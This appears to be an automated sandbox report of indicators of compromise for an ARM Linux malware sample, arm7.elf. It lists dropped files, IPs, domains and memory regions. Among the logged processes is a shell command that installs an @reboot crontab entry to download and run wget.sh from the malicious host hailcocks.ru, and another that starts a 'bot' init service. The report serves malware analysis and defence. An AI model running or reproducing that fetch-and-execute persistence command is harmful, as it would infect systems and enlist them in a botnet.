IOC Report
arm7.elf

loading gif

Files

File Path
Type
Category
Malicious
arm7.elf
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
initial sample
malicious
/root/.bashrc
ASCII text
dropped
malicious
/var/spool/cron/crontabs/tmp.hGK4g5
ASCII text
dropped
malicious
/etc/init/bot.conf
ASCII text
dropped

Processes

Path
Cmdline
Malicious
/usr/bin/dash
-
/usr/bin/rm
rm -f /tmp/tmp.slrTgTVxmA /tmp/tmp.wyNFB4lbH9 /tmp/tmp.mxqeE7vjoI
/usr/bin/dash
-
/usr/bin/cat
cat /tmp/tmp.slrTgTVxmA
/usr/bin/dash
-
/usr/bin/head
head -n 10
/usr/bin/dash
-
/usr/bin/tr
tr -d \\000-\\011\\013\\014\\016-\\037
/usr/bin/dash
-
/usr/bin/cut
cut -c -80
/usr/bin/dash
-
/usr/bin/cat
cat /tmp/tmp.slrTgTVxmA
/usr/bin/dash
-
/usr/bin/head
head -n 10
/usr/bin/dash
-
/usr/bin/tr
tr -d \\000-\\011\\013\\014\\016-\\037
/usr/bin/dash
-
/usr/bin/cut
cut -c -80
/usr/bin/dash
-
/usr/bin/rm
rm -f /tmp/tmp.slrTgTVxmA /tmp/tmp.wyNFB4lbH9 /tmp/tmp.mxqeE7vjoI
/tmp/arm7.elf
/tmp/arm7.elf
/tmp/arm7.elf
-
/bin/sh
/bin/sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
/bin/sh
-
/bin/sh
-
/usr/bin/crontab
crontab -l
/bin/sh
-
/usr/bin/crontab
crontab -
/tmp/arm7.elf
-
/bin/sh
/bin/sh -c "/sbin/initctl start bot"
/bin/sh
-
/tmp/arm7.elf
-
/tmp/arm7.elf
-
/tmp/arm7.elf
-
/tmp/arm7.elf
-
/tmp/arm7.elf
-
There are 26 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://hailcocks.ru/wget.sh;
unknown

Domains

Name
IP
Malicious
kingstonwikkerink.dyn
185.82.200.181

IPs

IP
Domain
Country
Malicious
213.182.204.57
unknown
Latvia
malicious
88.151.195.22
unknown
Azerbaijan
109.202.202.202
unknown
Switzerland
91.189.91.43
unknown
United Kingdom
91.189.91.42
unknown
United Kingdom

Memdumps

Base Address
Regiontype
Protect
Malicious
558f01e22000
page read and write
7fd7a07b4000
page read and write
7fd79feaa000
page read and write
7fd698038000
page read and write
7fff4bab8000
page read and write
7fd7a07f9000
page read and write
7fd7a0667000
page read and write
558f01e2b000
page read and write
7fd698030000
page execute read
558f03e40000
page read and write
7fd798021000
page read and write
7fd7a07b4000
page read and write
7fff4badc000
page execute read
7fd698040000
page read and write
7fd7a0486000
page read and write
558f03e29000
page execute and read and write
7fd7a0790000
page read and write
558f01e2b000
page read and write
7fd7a0486000
page read and write
7fff4badc000
page execute read
7fd7a0115000
page read and write
7fd7a02a4000
page read and write
7fd698038000
page read and write
558f05928000
page read and write
7fd797fff000
page read and write
7fd79fb48000
page read and write
7fd7a0115000
page read and write
7fd7a0138000
page read and write
7fd79feaa000
page read and write
7fd7a07b4000
page read and write
7fd79fb48000
page read and write
7fd7a0790000
page read and write
7fd698040000
page read and write
558f01bd1000
page execute read
7fd7a07b4000
page read and write
7fff4bab8000
page read and write
7fd79fab6000
page read and write
558f03e29000
page execute and read and write
7fd7a0790000
page read and write
7fd7a02a4000
page read and write
558f01e2b000
page read and write
7fd798021000
page read and write
7fff4badc000
page execute read
7fd7a0115000
page read and write
7fd7a0486000
page read and write
558f05928000
page read and write
7fd798021000
page read and write
7fd79f2ae000
page read and write
558f03e40000
page read and write
7fd7a07f9000
page read and write
7fd79f2ae000
page read and write
7fd79fb48000
page read and write
7fff4bab8000
page read and write
7fd7a0138000
page read and write
7fd7a0667000
page read and write
7fd797fff000
page read and write
7fd698030000
page execute read
7fd798021000
page read and write
7fd7a02a4000
page read and write
7fd79f2ae000
page read and write
7fd698040000
page read and write
558f05928000
page read and write
7fd79fab6000
page read and write
7fd797fff000
page read and write
558f03e29000
page execute and read and write
558f01bd1000
page execute read
7fd698038000
page read and write
7fd7a0486000
page read and write
558f01bd1000
page execute read
7fd79feaa000
page read and write
558f03e40000
page read and write
7fd79fab6000
page read and write
7fd698030000
page execute read
7fd698041000
page read and write
7fd7a0790000
page read and write
7fd797fff000
page read and write
7fd7a07f9000
page read and write
7fd7a07f9000
page read and write
558f01e2b000
page read and write
558f01e22000
page read and write
7fd7a0138000
page read and write
558f05928000
page read and write
7fd7a02a4000
page read and write
7fd7a0667000
page read and write
7fd79fab6000
page read and write
558f01e22000
page read and write
7fd79feaa000
page read and write
7fff4bab8000
page read and write
558f03e40000
page read and write
7fd698030000
page execute read
558f03e29000
page execute and read and write
7fd7a0115000
page read and write
7fd7a0138000
page read and write
558f01bd1000
page execute read
558f01e22000
page read and write
7fd698038000
page read and write
7fd7a0667000
page read and write
7fff4badc000
page execute read
7fd698040000
page read and write
7fd79f2ae000
page read and write
7fd79fb48000
page read and write
There are 91 hidden memdumps, click here to show them.